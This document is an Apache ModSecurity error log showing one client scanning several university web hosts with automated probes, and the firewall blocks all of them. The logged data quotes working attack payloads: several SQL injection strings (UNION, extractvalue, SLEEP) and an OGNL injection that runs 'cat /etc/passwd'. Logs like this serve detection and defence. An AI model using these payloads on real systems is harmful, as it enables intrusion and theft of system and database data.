[Tue Aug 29 11:32:17.454679 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100cCo-f0AAAQOv8UAAAAw"]
[Tue Aug 29 11:32:17.458318 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAPiBqoAAAAB"]
[Tue Aug 29 11:32:18.312955 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100sCo-f0AAAQnF90AAAAF"]
[Tue Aug 29 11:32:18.333310 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQUIDsAAAA2"]
[Tue Aug 29 11:32:18.349274 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQ83SYAAAAI"]
[Tue Aug 29 11:32:18.355143 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQUIDwAAAA2"]
[Tue Aug 29 11:32:18.355276 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQMr2EAAAAu"]
[Tue Aug 29 11:32:18.369541 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQ83ScAAAAI"]
[Tue Aug 29 11:32:18.373679 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQnF@AAAAAF"]
[Tue Aug 29 11:32:18.379766 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQKOfwAAAAs"]
[Tue Aug 29 11:32:18.383797 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAANwNxsAAAAb"]
[Tue Aug 29 11:32:18.389006 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAARA7YUAAAAA"]
[Tue Aug 29 11:32:18.396650 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQ83SgAAAAI"]
[Tue Aug 29 11:32:19.338227 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO1008Co-f0AAAQOv8wAAAAw"]
[Tue Aug 29 11:32:19.356949 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO1008Co-f0AAANWgZsAAAAG"]
[Tue Aug 29 11:32:21.304150 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAARD1NEAAAAH"]
[Tue Aug 29 11:32:21.311704 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAPDoEEAAAAP"]
[Tue Aug 29 11:32:21.315795 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAN9sU8AAAAJ"]
[Tue Aug 29 11:32:21.322440 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQnF@oAAAAF"]
[Tue Aug 29 11:32:21.326737 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQ9H2AAAAAK"]
[Tue Aug 29 11:32:21.344009 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQMr3YAAAAu"]
[Tue Aug 29 11:32:21.352993 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAPDoEMAAAAP"]
[Tue Aug 29 11:32:21.379969 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAARA7YsAAAAA"]
[Tue Aug 29 11:32:21.421744 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQMr3kAAAAu"]
[Tue Aug 29 11:32:21.426244 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAANsAakAAAAD"]
[Tue Aug 29 11:32:22.405370 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101sCo-f0AAAQV4WoAAAA3"]
[Tue Aug 29 11:32:22.477932 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQ83ToAAAAI"]
[Tue Aug 29 11:32:22.499007 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101sCo-f0AAAQ83TsAAAAI"]
[Tue Aug 29 11:32:22.513544 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAPDoEsAAAAP"]
[Tue Aug 29 11:32:22.513579 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAN9sVoAAAAJ"]
[Tue Aug 29 11:32:22.545056 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQOv9AAAAAw"]
[Tue Aug 29 11:32:22.561338 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAARD1NoAAAAH"]
[Tue Aug 29 11:32:23.310322 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAPiBrQAAAAB"]
[Tue Aug 29 11:32:23.315476 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAANwNzIAAAAb"]
[Tue Aug 29 11:32:23.320021 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAPxBYQAAAAS"]
[Tue Aug 29 11:32:23.327231 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAN9sV4AAAAJ"]
[Tue Aug 29 11:32:23.334334 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAANwNzMAAAAb"]
[Tue Aug 29 11:32:23.334982 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAQOv9IAAAAw"]
